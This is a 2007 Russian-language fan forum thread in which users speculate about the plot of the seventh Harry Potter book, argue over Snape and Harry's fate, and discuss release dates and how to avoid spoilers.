Она не раз говорила, что в конце герой должен остаться один - возможно, пыталась спровоцировать домыслы о смерти друзей Гарри. Но как-то концовка "все умерли" напрочь не вяжется с тем, что писалось в предыдущих частях.
Этого не может быть, потому что этого не может быть никогда. :)
Sandro, мы это где-то на первых страницах темы обсуждали - смотря какой перевод. Украинский быстрее выходит, чем русский.
Но ждать перевода - дело неблагодарное. Расскажут же сюжет за это время! :D
Я вот ужасно боюсь спойлеров. Пока читала шестую, даже комп не включала. :lol: А кто-то повесил ссылку, как в день выхода книги какой-то парень проорал на площади, что Снейп убьет Дамблдора. Его самого чуть не убили. :lol:
Відправлено: Mar 2 2007, 16:18
Насчет смерти Дамболдора по телику в новостях показывали!
Відправлено: Mar 2 2007, 16:33
Цитата (Felina @ Mar 2 2007, 16:14)
Не удивлюсь, если она изменила сюжет, начитавшись форумов и фан-сайтов, и постаралась максимально увести его от самых популярных догадок.

Ну это вряд ли! Все-таки она не раз говорила, что закончила книгу именно так, как хотела, что финал именно такой, каким она его планировала. Например:
Цитата (http://jkrowling.nm.ru/interview/richard_judy_260606.html)

JKR: Последняя, заключительная глава хранится в надежном месте, хотя теперь она слегка изменилась.

J: Серьезно?

JKR: Да, один из героев был помилован.

R: Да что вы?

JKR: Да.

J: Я полагаю, вы… я только…

JKR: Но должна признаться, что погибли двое, которых я сначала не хотела убивать.

То есть изменения все же не такие значительный, по крайней мере можно с уверенностью говорить, что судьба Гарри и Волда не изменилась.
Цитата (Felina @ Mar 2 2007, 16:14)

Она не раз говорила, что в конце герой должен остаться один - возможно, пыталась спровоцировать домыслы о смерти друзей Гарри.

Я склонен считать, что в данном случае имелась ввиду помощь взрослых, более опытных людей. Так, Сириус не мог бросить Гарри иначе, как умерев (хотя, вообще говоря, тут мог или не мог - зависит от таланта писателя), а помощь от него была бы значительной - все-таки анимаг, с кучей артефактов и знаний, о братце своем (который лидирует в голосовании про РАБ'а) мог бы что-нибудь раньше времени ляпнуть. О помощи со стороны Дамба я уж и не говорю.
Что же касается друзей, то у них схожие с Гарри проблемы, знания и силы. Конечно, есть некая "специлизация", но вообще говоря, все трио можно считать одним героем. Конечно, на финальный бой Гарри, скорее всего, пихнут одного (для чего вовсе не обязательно убивать друзей! Гарри просто может потихоньку аппарировать в неизвестном направлении, решив не подвергать их опасности - как Фродо в ВК), но вот хорки они точно будут вместе искать.
Кстати, в ВК примерно такая же ситуация - герой остается абсолютно без помощи всех, кто мог бы как-то значительно упростить путь, с одним Семом, и должен сам решать проблемы, без помощи меча Арагорна, мудрости и заклинаний Гендальфа или стрел Леголаса.
Цитата (Felina @ Mar 2 2007, 16:14)

Но как-то концовка "все умерли" напрочь не вяжется с тем, что писалось в предыдущих частях.

Еще бы! Впочем, Ро говорила, что напишет о дальнейшей жизни выживших героев - значит, все же кто-то значимый выживет.
Цитата (Felina @ Mar 2 2007, 16:14)

А кто-то повесил ссылку, как в день выхода книги какой-то парень проорал на площади, что Снейп убьет Дамблдора. Его самого чуть не убили. :lol:

Кошмар! Хоть на улицу не выходи. Срочно покупаю зелье для создания временной слепоты и глухоты =megalol=.
Відправлено: Mar 2 2007, 16:50
Pokibor, да, конечно, принципиально схема измениться не могла, но все же помилование некоторых героев - это довольно серьезный шаг. Вот такие моменты я и имела в виду, когда говорила об изменениях сюжета.
В аналогиях с ВК я тоже уверена. У двух романов схожая мораль, не только построение. Помощь друзей 100% будет - тоже по логике полагается, а вот финальная сцена... Почему-то я жду там сюрпризов. :)
Цитата (Pokibor @ Mar 2 2007, 16:33)
Срочно покупаю зелье для создания временной слепоты и глухоты

Угу, а читать как, со слепотой-то? :lol:
Відправлено: Mar 2 2007, 16:55
Нет ну кроме шуток, как быть со спойлерами? поделитесь опытом по прошлым прочтениям, а то про смерть Дамблдора даже я на тот момент, абсолютно не увлекаясь поттером, краем уха слышала...
Відправлено: Mar 2 2007, 17:08
Цитата (Felina @ Mar 2 2007, 16:50)
Угу, а читать как, со слепотой-то? :lol:


Ну так я имел ввиду, что бы включать/отключать по желанию можно было.

Heather
Ну наверное нужно
1) Ни в коем случае не включать телевизор и не слушать радио! А то сообщения "На Роулинг подали в суд родственники людей, тронувшихся умом после гибели в последней книги сериии [подставить имя погибающих персонажей]" ясно говорят о развитии сюжета.
2) Прекратить контакты с внешним миром до окончания прочтения книги
3) Лучше всего улететь в антарктиду и заказать книгу с доставкой туда :) .
Відправлено: Mar 2 2007, 17:22
Heather, перед выходом шестой книги Девей установил тэг спойлера, и модераторы следили, чтобы все спойлеры были спрятаны под него, а темы о шестой книге находились в отдельном подфоруме.
Я, зажав уши, зашла в форум Книги день на третий, и сразу увидела ссылку на книгу в теме, где тусовались переводчики. Скачала, кинула на КПК, выключила комп и больше ничего не включала, пока не прочла. :lol: После чего пошла модерировать Книги и прятать все в теги спойлер. =megalol=
Відправлено: Mar 2 2007, 17:23
Pokibor
мда, ну и перспектива :D , но комп то все равно придется включить чтобы скачать книгу, а сначала надо будет найти откуда, и пока будешь искать триста раз все спойлеры уже прочтешь.. ;(
Felina, буду надеяться на подобное развитие событий, а еще я подумала, надо будет всех домашних предупредить если что услышат чтоб молчали.
Відправлено: Mar 2 2007, 17:44
Heather
Качайте из пиринговый сетей! Я к лету специально с этой целью поставлю у себя Bit Torent и еще какую-нибудь сеть. Жалко, что осла вроде бы злые буржуи прикрыли :(.
Відправлено: Mar 2 2007, 17:50
Pokibor, ослом я не дождусь, даже если не прикрыли... :( Я ее быстрее сама напишу, чем скачаю. :lol:
Если только в локальном пиринге - у на DC++ - выложит кто-нить... Это был бы идеальный вариант.
Додано через 11 хвилин
Цитата (Ирка Блэк @ Mar 2 2007, 16:18)
Насчет смерти Дамболдора по телику в новостях показывали!

Это было до того, как вышел перевод?!
Відправлено: Mar 4 2007, 10:47
А когда на русском будет?
Відправлено: Mar 4 2007, 10:48
Кстати да,это интересно!
Відправлено: Mar 4 2007, 10:50
Прочитайте http://jkrowling.nm.ru/chavo.html и посчитайте сами.
Відправлено: Mar 4 2007, 10:52
Pokibor, там не написано!
Додано через хвилину
А точнее знак вопроса!
Відправлено: Mar 4 2007, 10:55
А точнее посмотрите на разницу между выходом оригинала и перевода ПП, например, и прикиньте сами (я "посчитайте" для кого написал?). Или Вам с точностью до дня нужно?
Відправлено: Mar 4 2007, 11:05
Можно и сточностью до дня! Но считать я сама умею!
Відправлено: Mar 9 2007, 01:25
=drag=
Відправлено: Mar 11 2007, 18:32
о_О до выхода на русском ещё ждать и ждать (( для меня это самая долгожданная книга,так что читать на инглише ^^
Додано через хвилину
о_О до выхода на русском ещё ждать и ждать (( для меня это самая долгожданная книга,так что читать на инглише ^^
Відправлено: Mar 11 2007, 18:35
о_О до выхода на русском ещё ждать и ждать (( для меня это самая долгожданная книга,так что читать на инглише ^^
Відправлено: Mar 15 2007, 14:56
почему ак долго она ее писала?
Відправлено: Mar 15 2007, 14:58
Цитата (Азмари @ Mar 15 2007, 14:56)
почему ак долго она ее писала?

Почему долго? Сравните с другими книгами о ГП: http://jkrowling.nm.ru/chavo.html
Відправлено: Mar 16 2007, 21:36
у нас 7 июля!!!!!
Відправлено: Mar 17 2007, 06:05
Цитата (Nenci Mraks @ Mar 16 2007, 21:36)
у нас 7 июля!!!!!

Где это у вас седьмого июля?? Когда официальная дата только 21?? Или вы где-то в особенном месте живете??
Відправлено: Mar 17 2007, 23:07
Цитата (Nenci Mraks @ Mar 16 2007, 21:36)
у нас 7 июля!!!!!

2008 года?:)
Відправлено: Mar 19 2007, 18:32
Думаю за недели 2-4 и к нам доберетья, эх...скорее-бы :)
Відправлено: Mar 20 2007, 14:55
А я слышал что Джоун Роуленг будет продолжать книгу о ГП и что седьмая это не конец, извинити сылку не могу сбросить но на пару сайтов видел что это написано в том числе в интервъю Джоун Роуленг. Поэтому надежда теплица,маленькая но теплица
Відправлено: Mar 20 2007, 15:20
Цитата (цикорий @ Mar 20 2007, 14:55)
А я слышал что Джоун Роуленг будет продолжать книгу о ГП и что седьмая это не конец, извинити сылку не могу сбросить но на пару сайтов видел что это написано в том числе в интервъю Джоун Роуленг. Поэтому надежда теплица,маленькая но теплица

Нет, единственное что она обещала - некая энциклопедия мира ГП. Смиритесь, 7 книга - последняя. Разве что Роулинг познает на себе всю сложность положения Конан Дойля посли убийства Шерлока Холмса...
Відправлено: Mar 20 2007, 16:25
Цитата (Pokibor @ Mar 20 2007, 15:20)
Нет, единственное что она обещала - некая энциклопедия мира ГП. Смиритесь, 7 книга - последняя. Разве что Роулинг познает на себе всю сложность положения Конан Дойля посли убийства Шерлока Холмса...

Насчет Конан Дойля - это точно подмечено! Все может быть, но мне лично кажется, что ей уже самой порядком поднадоело... Да и потом, если жизнь вечна, то она не интересна! (это я так к слову) Все должно иметь логический конец!
Відправлено: Mar 21 2007, 16:04
Должно, не спорю, но ведь не хочется, чтоб ГП "логически кончился"!
Відправлено: Mar 22 2007, 20:46
Насколько я понимаю Ро все-таки прибьет Гарри (очень много слухов по этому поводу в инете). И сама она говорила что одного ГЛАВНОГО героя ей придется убить. Так шо 7 она же и последняя ;(
Відправлено: Mar 23 2007, 10:17
Су Джинн, Главный герой это конечно Гарри. Но вы кажеться забывайте, что есть еще Рон, Гермиона, СНЕЙП, тот же Драко в конце концов, и еще пара тройка имен которые можно считать главными :D
Відправлено: Mar 23 2007, 10:22
Цитата (VeSTo4ka @ Mar 23 2007, 10:17)
Су Джинн, Главный герой это конечно Гарри. Но вы кажеться забывайте, что есть еще Рон, Гермиона, СНЕЙП, тот же Драко в конце концов, и еще пара тройка имен которые можно считать главными :D

Но ведь Джоан Роулинг ясно сказала что убьёт кого именно из этой троицы! То есть только Гарри Рона или Гермиону! Лично я надеюсь что Гермиона останется в живых а судьба Гарри меня мало волнует!
Відправлено: Mar 23 2007, 10:28
Цитата (Rachael @ Mar 23 2007, 10:22)
Но ведь Джоан Роулинг ясно сказала что убьёт кого именно из этой троицы!

=-O o_O
Вы живете в какой-то иной реальности? Это где она такое сказала? Ссылку!!! Ни в одном интервью этого не было! (Или Вы тот случай с пятью приглашеными на обед имеете ввиду? Так он только косвенно подтверждает, что трио останется в живых, а вот Хагрид имеет шансы присоединиться к Дамблдору....)

Цитата (Rachael @ Mar 23 2007, 10:22)

То есть только Гарри Рона или Гермиону! Лично я надеюсь что Гермиона останется в живых а судьба Гарри меня мало волнует!

У Гермионы меньше шансов погибнуть, чем почти у всех остальных персонажей, ибо Роулинг ее списывала с себя, ставила в пример дочке ну и т.д. и т.п.

P.S. Разве что Вы Снейпа главным героем не считаете... ну так за такое к нему отношение многие на этом форуме могут =butcher=
Відправлено: Mar 23 2007, 10:37
Pokibor
По моему Снэйп стоит далеко от главного героя и многие ждут седьмой книги только потому что там убьют этого идиота!
Відправлено: Mar 23 2007, 10:55
Цитата (Rachael @ Mar 23 2007, 10:37)

По моему Снэйп стоит далеко от главного героя и многие ждут седьмой книги только потому что там убьют этого идиота!

Стоп-стоп-стоп. Про то, что Снейп на стороне Дамблдора и пр. писать не буду, так как это уже давно обсуждается в другом месте, но вот что он (как и Волдеморт, кстати) является главным героем - это, простите, очевидно. Нас не просто так пичкают Снейпом со времен первой части, и до сих пор роль в сюжете он играл очень весомую. "Добрый" он или "злой" - это, повторюсь, другая история (Ваше отношение к Северусу Снейпу), но он такой же главный герой, как и Дамблдор, любой из трио и Волдеморт.
Відправлено: Mar 23 2007, 20:33
Хочу объяснить почему я думаю что убьют Гарри.
Во первых многие считают что он хорукс (это тоже обсуждалось не помню где, но точно обсуждалось)
Во вторых он имеет теснуую связь с Волди (расщепление души и все такое, змеиный язык)
И в третих он очень мощный магический артефакт, который никто не контролирует. Он попросту опасен. Вспомните, что Ро даже не захотела чтобы он встречался с Джинни. И Дамба она убила, потому что он был не такой как все "слишком одинокий"

Есть правда пророчество, что если один умрет, то другой будет жить, но тетя Ро если захочет найдет как вывернутся из этой ситуации
Відправлено: Mar 23 2007, 20:45
Цитата (Су Джинн @ Mar 23 2007, 20:33)

Во первых многие считают что он хорукс (это тоже обсуждалось не помню где, но точно обсуждалось)

Я даже знаю, где.
И, должен отметить, что пока что аргументы "против" как-то более убедительны.
Цитата (Су Джинн @ Mar 23 2007, 20:33)

Во вторых он имеет тесную связь с Волди (расщепление души и все такое, змеиный язык)

И что это значит? Если не то, что Гарри - хоркрукс, то ничего ровным счетом. Так что этот смысл этого пункта непонятен.
Цитата (Су Джинн @ Mar 23 2007, 20:33)

И в третих он очень мощный магический артефакт, который никто не контролирует. Он попросту опасен. Вспомните, что Ро даже не захотела чтобы он встречался с Джинни. И Дамба она убила, потому что он был не такой как все "слишком одинокий"

Что-то я не понял... Это с каких это пор Гарри - мощный артефакт??? С Джинни у них любовь есть, и от этого никуда не деться никому из пары. То, что Гарри не хочет подвергать Джинни опастности, еще ничего не значит. А еще у Гарри есть друзья... так что про одиночество - это опять не ясно в какую степь. Про артефакт я вообще не понял - пока что Гарри ни одной сверхординарной способности не проявил. Или Вы таковой парселтанг считаете (он всех заговорит на нем до смерти!)? Аааа, в рамках фразы Дамба о любви он всех, видимо, залюбливать будет...
Цитата (Су Джинн @ Mar 23 2007, 20:33)

Есть правда пророчество, что если один умрет, то другой будет жить, но тетя Ро если захочет найдет как вывернутся из этой ситуации

А вот тут как раз таки пророчество не мешает! Потому что есть в нем замечательное слово either, а его можно трактовать и как "один из двух", так и "оба", то есть как раз вариант "погибнут оба" пророчеству не противоречит, как, впрочим, и вариант "погибнет только один". Читайте оригинал-с, в нем вообще пророчество туманно звучит...
Відправлено: Mar 24 2007, 13:53
Pokibor ,
молодец! Не фиг называть Снейпа идиотом!
Цитата (Rachael @ Mar 23 2007, 10:37)
Pokibor
По моему Снэйп стоит далеко от главного героя и многие ждут седьмой книги только потому что там убьют этого идиота!

Ты говоришь за всех, чего они ждут от 7 книги? Rachael
Відправлено: Mar 24 2007, 13:58
Цитата (Домино @ Mar 24 2007, 13:53)
Pokibor ,
молодец! Не фиг называть Снейпа идиотом!

Цитата (Домино @ Mar 24 2007, 13:53)
Ты говоришь за всех, чего они ждут от 7 книги? Rachael

За всех кого я знаю! Абсолютно!
Відправлено: Mar 24 2007, 14:23
Rachael,
Цитата (Rachael @ Mar 24 2007, 13:58)
За всех кого я знаю! Абсолютно!

А я говорю с точки зрения логики, подкрепляя свое мнение доказательствами. Кстати, можете радоваться - то, что Снейп погибнет в 7 книги очень вероятно, но вот только он окажется на стороне Дамба (чему куча подтверждений) и погибнет как герой (это мое мнение). После такого "идиотом" называть его уже будет несколько... глупо.

P.S. Кстати, если постоянно ходящий по лезвию ножа Снейп у Вас - идиот, то кто ж тогда не идиот? Снейп рискует больше кого бы то ни было в книге, кстати. Двойные агенты всегда рискуют больше всех...
Відправлено: Mar 24 2007, 14:43
Цитата (Су Джинн @ Mar 23 2007, 20:33)
Хочу объяснить почему я думаю что убьют Гарри.
Во первых многие считают что он хорукс (это тоже обсуждалось не помню где, но точно обсуждалось)
Во вторых он имеет теснуую связь с Волди (расщепление души и все такое, змеиный язык)
И в третих он очень мощный магический артефакт, который никто не контролирует. Он попросту опасен. Вспомните, что Ро даже не захотела чтобы он встречался с Джинни. И Дамба она убила, потому что он был не такой как все "слишком одинокий"

Есть правда пророчество, что если один умрет, то другой будет жить, но тетя Ро если захочет найдет как вывернутся из этой ситуации


Если честно, то ни одну из твоих фраз я не нахожу трезвой... ЭТО ТЕОРИИ. И я во всем что ты перечислила сильно сомневаюсь.
Відправлено: Mar 24 2007, 14:49
кагта книга выйдет?
0 Користувачів переглядають дану тему ( Гостей і Прихованих Користувачів)
Користувачів:

Сторінки: (64)  [%] « Перша ... 14 15 16 17 18 ... Остання ». Нова тема

 



[ Script Execution time: 0.1546 ]   [ 160 queries used ]   [ GZIP ввімкнено ]   [ Time: 06:09:43, 10 May 2024 ]





Рейтинг Ролевых Ресурсов - RPG TOP